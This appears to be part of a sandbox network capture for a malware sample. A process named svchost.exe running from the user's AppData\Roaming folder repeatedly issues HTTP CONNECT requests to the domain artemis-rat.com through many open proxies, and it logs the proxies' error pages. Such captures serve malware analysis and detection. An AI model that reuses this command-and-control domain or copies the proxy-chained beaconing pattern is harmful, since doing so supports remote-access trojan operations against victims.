                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3154192.168.2.56007089.168.121.175312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.195260048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3155192.168.2.558320174.77.111.196414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.208241940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3156192.168.2.5601323.97.176.251312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.231097937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.460315943 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3157192.168.2.560076122.51.123.2198043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.231122971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3158192.168.2.56015194.131.64.1575837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.279259920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.500094891 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/3.5.20
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:34 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3661
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from ezproxies.com
                                                                                    X-Cache-Lookup: NONE from ezproxies.com:58378
                                                                                    Via: 1.1 ezproxies.com (squid/3.5.20)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verd


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3159192.168.2.560101212.118.43.1438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.279264927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.617870092 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3160192.168.2.560124133.18.234.138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.279704094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.588430882 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                    Content-Type: text/html
                                                                                    Connection: close
                                                                                    Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                                                                    Data Ascii: Backend not available


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3161192.168.2.560152142.54.232.6414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.281332970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3162192.168.2.56009339.99.144.438043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.283647060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.615431070 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3163192.168.2.5601088.219.97.2488043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.284251928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3164192.168.2.559875103.197.71.78043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.284799099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3165192.168.2.55985682.223.121.726359643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.289340973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.366213083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3166192.168.2.558542185.8.67.90808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.296370983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3167192.168.2.558571129.126.65.78415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.306837082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3168192.168.2.560141119.28.60.64809043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.311764956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3169192.168.2.560120202.150.1.878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.318578959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3170192.168.2.5601258.219.179.2371567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.322801113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3171192.168.2.558495148.72.209.1746493843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.323431015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.677234888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3172192.168.2.560237200.111.182.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.325328112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3173192.168.2.560246200.111.182.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.326674938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3174192.168.2.560253200.111.182.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.327385902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3175192.168.2.560264200.111.182.644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.328517914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3176192.168.2.560123103.231.78.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.338134050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3177192.168.2.56014547.106.76.196808843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:34.346566916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.145929098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.488663912 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                    Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3178192.168.2.560160172.67.3.1088043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
